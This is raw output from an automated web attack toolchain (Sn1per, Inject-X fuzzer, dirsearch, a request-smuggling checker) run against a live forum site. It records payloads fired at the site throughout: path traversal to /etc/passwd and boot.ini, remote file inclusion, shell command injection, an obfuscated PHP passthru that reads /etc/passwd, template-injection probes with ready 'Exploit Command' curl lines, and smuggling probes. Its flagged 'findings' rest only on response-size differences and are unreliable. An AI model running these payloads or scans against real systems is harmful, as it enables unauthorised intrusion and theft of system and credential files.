https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1881875246:1692489950:8wox0di1wm-ey66PtcF91fO9LCwCm9J2h0ztfZdTAX8/7f9698f4be022700/dfe4e08d504326e
https://breachforums.is/cdn-cgi/challenge-platform/h/g/flow/ov1/1925288593:1692245304:MagemM1DCfAKgoViu_BXdDWvb6dIAjXe1v9taCrAgP0/7f7f36f9da139645/7202422cc9a4b05
====================================================================================•x[2023-09-17](20:48)x•
 FETCHING HACKERTARGET URLS 
====================================================================================•x[2023-09-17](20:48)x•
====================================================================================•x[2023-09-17](20:48)x•
 FETCHING GUA URLS 
====================================================================================•x[2023-09-17](20:48)x•
====================================================================================•x[2023-09-17](20:48)x•
 RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN 
====================================================================================•x[2023-09-17](20:48)x•

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 


==================================================================================================
https://breachforums.is:443
==================================================================================================                  
__________________________________________________________________________________________________

                                                                                                                    
                _.._                                                                                                
              .'    '.                                                                                              
             /   __   \                                                                                             
          ,  |   ><   |  ,                                                                                          
         . \  \      /  / .                                                                                         
          \_'--`(  )'--'_/                                                                                          
            .--'/()'--.                                                                                             
@xer0dayz  /  /` '' `\  \                                                                                           
             |        |                                                                                             
              \      /                                                                                              
                                                                                                                    
                                                                                                                    
 + -- --=[ https://sn1persecurity.com
 + -- --=[ blackwidow v1.3 by @xer0dayz 

[+] URL's Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-urls-sorted.txt                                       
__________________________________________________________________________________________________

[+] Dynamic URL's Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-dynamic-sorted.txt                                    
__________________________________________________________________________________________________

[+] Form URL's Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-forms-sorted.txt                                      
__________________________________________________________________________________________________

[+] Unique Dynamic Parameters Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-dynamic-unique.txt                                    
__________________________________________________________________________________________________

[+] Sub-domains Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-subdomains-sorted.txt                                 
__________________________________________________________________________________________________

[+] Emails Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-emails-sorted.txt                                     
__________________________________________________________________________________________________

[+] Phones Discovered: 
/usr/share/blackwidow/breachforums.is_443/breachforums.is_443-phones-sorted.txt                                     
__________________________________________________________________________________________________

[+] Loot Saved To: 
/usr/share/blackwidow/breachforums.is_443/                                                                          
__________________________________________________________________________________________________

      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/?__cf_chl_tk=3WkbHpWJDB1ImnWz3hxOIxYQjFKmHksDosU7ECIyP5s-1692197194-0-gaNycGzNC1A [404] [0]                                                                                                                 
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/captcha.php?imagehash=141828baf01d56225b0847031cab8d6d [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/alerts.php?modal=1 [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a [200] [179836]                                                                                                                  
======================================================================================================

>>> https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=7ee5b8440c22172a [200] [168237]                                                                                                                  
======================================================================================================
[D] Fuzzing Parameter: ray=
----------------------------------------------------
[i] Trying Payload: google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=google.com [200] [177569] [-9332]                                                                                                       
[i] Trying Payload: //google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=//google.com [200] [176227] [-7990]                                                                                                     
[i] Trying Payload: https%3A//google.com
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=https%3A//google.com [200] [175965] [-7728]                                                                                             
[i] Trying Payload: INJECTX
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=INJECTX [200] [176251] [-8014]                                                                                                          
[i] Trying Payload: '
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=' [200] [172752] [-4515]                                                                                                                
[i] Trying Payload: \
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=\ [200] [181267] [-13030]                                                                                                               
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini [200] [176386] [-8149]                                                     
[i] Trying Payload: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00 [200] [176458] [-8221]                                                  
[i] Trying Payload: ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm                                                                                                        
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm [200] [176289] [-8052]     
[i] Trying Payload: ..%2fWEB-INF%2fweb.xml
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=..%2fWEB-INF%2fweb.xml [200] [186139] [-17902]                                                                                          
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/../../../../../../../../../../../../../../../../../etc/passwd [200] [179920] [-11683]                                                  
[i] Trying Payload: /../../../../../../../../../../../../../../../../../etc/passwd%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/../../../../../../../../../../../../../../../../../etc/passwd%00 [200] [177727] [-9490]                                                
[i] Trying Payload: /etc/passwd
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/etc/passwd [200] [177569] [-9332]                                                                                                      
[i] Trying Payload: /etc/passwd%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=/etc/passwd%00 [200] [176227] [-7990]                                                                                                   
[i] Trying Payload: C:\boot.ini
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=C:\boot.ini [200] [179809] [-11572]                                                                                                     
[i] Trying Payload: C:\boot.ini%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=C:\boot.ini%00 [200] [181734] [-13497]                                                                                                  
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=hTtP://tests.arachni-scanner.com/rfi.md5.txt [200] [176386] [-8149]                                                                     
[i] Trying Payload: hTtP://tests.arachni-scanner.com/rfi.md5.txt%00
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=hTtP://tests.arachni-scanner.com/rfi.md5.txt%00 [200] [171562] [-3325]                                                                  
[i] Trying Payload: %7B%7B1336%252B1%7D%7D
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D [200] [174421] [-6184]                                                                                           
[+] Server Side Template Injection Found! 
[+] Vulnerable URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D                                                                                                           
[c] Exploit Command: curl -s 'https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%7B1336%252B1%7D%7D' | egrep 1337 --color=auto                                                                      
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1 [200] [176458] [-8221]                                                                                                         
[+] Server Side Template Injection Found! 
[+] Vulnerable URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1
[c] Exploit Command: curl -s 'https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=1336%2B1' | egrep 1337 --color=auto                                                                                    
[i] Trying Payload: %24%28cat%2B/etc/passwd%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%24%28cat%2B/etc/passwd%29 [200] [185659] [-17422]                                                                                      
[i] Trying Payload: %24%28sleep%2B10%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%24%28sleep%2B10%29 [200] [172752] [-4515]                                                                                              
[i] Trying Payload: phpinfo%28%29
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=phpinfo%28%29 [200] [183751] [-15514]                                                                                                   
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%24%7Bpassthru%28chr%2899%29.chr%2897%29.chr%28116%29.chr%2832%29.chr%2847%29.chr%28101%29.chr%28116%29.chr%2899%29.chr%2847%29.chr%28112%29.chr%2897%29.chr%28115%29.chr%28115%29.chr%28119%29.chr%28100%29%29%7D%7D%7B%24%7Bexit%28%29%7D%7D [200] [181667] [-13430]                                                                                                       
[i] Trying Payload: 1336%2B1
[i] New URL: https://breachforums.is/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=%7B%24%7Bpassthru%28chr%28115%29.chr%28108%29.chr%28101%29.chr%28101%29.chr%28112%29.chr%2832%29.chr%2849%29.chr%2848%29%29%7D%7D%7B%24%7Bexit%28%29%7D%7D [200] [186139] [-17902]                                                                          
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/.well-known/ai-plugin.json [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


      ____        _           __ _  __
     /  _/___    (_)__  _____/ /| |/ /
     / // __ \  / / _ \/ ___/ __/   / 
   _/ // / / / / /  __/ /__/ /_/   |  
  /___/_/ /_/_/ /\___/\___/\__/_/|_|  
         /_____/                     

--== Inject-X Fuzzer by @xer0dayz ==-- 
   --== https://sn1persecurity.com ==-- 


>>> https://breachforums.is/awards.php?view=13 [404] [0]
======================================================================================================
[F] Received HTTP Status 404 - Page Not Found. Skipping...
______________________________________________________________________________________________________


====================================================================================•x[2023-09-17](20:49)x•
 RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/.well-known/ai-plugin.json
https://breachforums.is/.well-known/assetlinks.json
https://breachforums.is/.well-known/dnt-policy.txt
https://breachforums.is/.well-known/gpc.json
https://breachforums.is/.well-known/security.txt
https://breachforums.is/.well-known/trust.txt
https://breachforums.is/ads.txt
https://breachforums.is/app-ads.txt
https://breachforums.is/canary.txt
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING INTERESTING PARAMETERS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING XSS STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/alerts.php?modal=1
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING SSRF STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/showthread.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/custom.min.css?t=1690800105
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING REDIRECT STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING RCE STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING IDOR STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/normalize.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING SQL STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/usercp.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING LFI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1687726236
https://breachforums.is/cache/themes/theme3/upgrades.min.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING SSTI STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/awards.php?view=13
https://breachforums.is/awards.php?view=15
https://breachforums.is/awards.php?view=28
https://breachforums.is/awards.php?view=6
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING DEBUG STATIC ANALYSIS 
====================================================================================•x[2023-09-17](20:49)x•
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1687726236
https://breachforums.is/cache/themes/theme1/latestposts.min.css?t=1694000093
====================================================================================•x[2023-09-17](20:49)x•
 DOWNLOADING ALL JAVASCRIPT FILES 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 DISPLAYING ALL JAVASCRIPT COMMENTS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 DISPLAYING ALL JAVASCRIPT LINKS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING LINKFINDER 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 DISPLAYING PATH RELATIVE LINKS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 DISPLAYING JAVASCRIPT URLS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 DISPLAYING JAVASCRIPT DOMAINS 
====================================================================================•x[2023-09-17](20:49)x•
====================================================================================•x[2023-09-17](20:49)x•
 RUNNING COMMON FILE/DIRECTORY BRUTE FORCE 
====================================================================================•x[2023-09-17](20:49)x•

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: htm, html, asp, aspx, php, jsp, js | HTTP method: GET | Threads: 100 | Wordlist size: 9696

Output File: /usr/share/sniper/loot/workspace/https:--breachforums.is/web/dirsearch-breachforums.is.txt

Error Log: /usr/share/sniper/plugins/dirsearch/logs/errors-23-09-17_20-49-19.log

Target: http://breachforums.is:443/

[20:49:19] Starting: 
                                                                               
Task Completed                                                                                                      
====================================================================================•x[2023-09-17](21:03)x•
 RUNNING HTTP REQUEST SMUGGLING DETECTION 
====================================================================================•x[2023-09-17](21:03)x•

  ______                         _              
 / _____)                       | |             
( (____  ____  _   _  ____  ____| | _____  ____ 
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |    
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|    
                    (_____(_____|               

     @defparam                         v1.1

[+] URL        : https://breachforums.is:443
[+] Method     : POST
[+] Endpoint   : 
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 0 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.19 - 400) (CLTE: 0.21 - 400)                                           
[tabprefix1]   : OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[tabprefix2]   : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[space1]       : OK (TECL: 0.18 - 400) (CLTE: -2.28 - 400)                                          
[midspace-01]  : OK (TECL: 0.21 - 400) (CLTE: 0.21 - 400)                                           
[postspace-01] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[prespace-01]  : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[endspace-01]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-01] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-01] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-01]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-01]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-01]: OK (TECL: 0.30 - 400) (CLTE: 0.26 - 400)                                           
[endspacexn-01]: OK (TECL: 0.24 - 400) (CLTE: 0.22 - 400)                                           
[midspace-04]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[postspace-04] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[prespace-04]  : OK (TECL: 0.20 - 400) (CLTE: 0.20 - 400)                                           
[endspace-04]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-04] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-04] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-04]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-04]: SOCKET ERROR                                                                       
[endspacerx-04]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-04]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-08]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[postspace-08] : OK (TECL: 0.26 - 400) (CLTE: 0.24 - 400)                                           
[prespace-08]  : OK (TECL: 0.26 - 400) (CLTE: 0.30 - 400)                                           
[endspace-08]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-08] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-08] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-08]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-08]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-08]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-08]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-09]  : OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[postspace-09] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[prespace-09]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspace-09]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-09] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-09] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-09]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-09]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-09]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-09]: OK (TECL: 0.19 - 400) (CLTE: 0.17 - 400)                                           
[midspace-0a]  : OK (TECL: 0.40 - 400) (CLTE: 0.19 - 400)                                           
[postspace-0a] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[prespace-0a]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspace-0a]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-0a] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-0a] : OK (TECL: 0.19 - 400) (CLTE: 0.20 - 400)                                           
[rxprespace-0a]: OK (TECL: 0.19 - 400) (CLTE: 0.24 - 400)                                           
[xnprespace-0a]: OK (TECL: 0.24 - 400) (CLTE: 0.24 - 400)                                           
[endspacerx-0a]: OK (TECL: 0.25 - 400) (CLTE: 0.17 - 400)                                           
[endspacexn-0a]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[midspace-0b]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-0b] : OK (TECL: 0.20 - 400) (CLTE: 0.18 - 400)                                           
[prespace-0b]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspace-0b]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xprespace-0b] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-0b] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-0b]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-0b]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-0b]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-0b]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[midspace-0c]  : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[postspace-0c] : OK (TECL: 0.21 - 400) (CLTE: 0.19 - 400)                                           
[prespace-0c]  : OK (TECL: 0.23 - 400) (CLTE: 0.20 - 400)                                           
[endspace-0c]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-0c] : OK (TECL: 0.21 - 400) (CLTE: 0.19 - 400)                                           
[endspacex-0c] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-0c]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-0c]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-0c]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-0c]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[midspace-0d]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[postspace-0d] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[prespace-0d]  : OK (TECL: 0.21 - 400) (CLTE: 0.23 - 400)                                           
[endspace-0d]  : OK (TECL: 0.26 - 400) (CLTE: 0.27 - 400)                                           
[xprespace-0d] : OK (TECL: 0.22 - 400) (CLTE: 0.21 - 400)                                           
[endspacex-0d] : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-0d]: OK (TECL: 0.20 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-0d]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-0d]: OK (TECL: 0.19 - 400) (CLTE: 0.17 - 400)                                           
[endspacexn-0d]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[midspace-1f]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[postspace-1f] : OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[prespace-1f]  : OK (TECL: 0.26 - 400) (CLTE: 0.20 - 400)                                           
[endspace-1f]  : OK (TECL: 0.18 - 400) (CLTE: 0.20 - 400)                                           
[xprespace-1f] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-1f] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[rxprespace-1f]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-1f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-1f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacexn-1f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[midspace-20]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[postspace-20] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[prespace-20]  : OK (TECL: 0.17 - 400) (CLTE: 0.19 - 400)                                           
[endspace-20]  : OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-20] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-20] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-20]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[xnprespace-20]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[endspacerx-20]: OK (TECL: 0.19 - 400) (CLTE: 0.30 - 400)                                           
[endspacexn-20]: OK (TECL: 0.25 - 400) (CLTE: 0.27 - 400)                                           
[midspace-7f]  : OK (TECL: 0.24 - 400) (CLTE: 0.19 - 400)                                           
[postspace-7f] : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[prespace-7f]  : OK (TECL: 0.18 - 400) (CLTE: 0.23 - 400)                                           
[endspace-7f]  : OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xprespace-7f] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacex-7f] : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[rxprespace-7f]: OK (TECL: 0.18 - 400) (CLTE: 0.19 - 400)                                           
[xnprespace-7f]: OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
[endspacerx-7f]: OK (TECL: 0.19 - 400) (CLTE: 0.19 - 400)                                           
[endspacexn-7f]: OK (TECL: 0.19 - 400) (CLTE: 0.18 - 400)                                           
[midspace-a0]  : OK (TECL: 0.18 - 400) (CLTE: 0.18 - 400)                                           
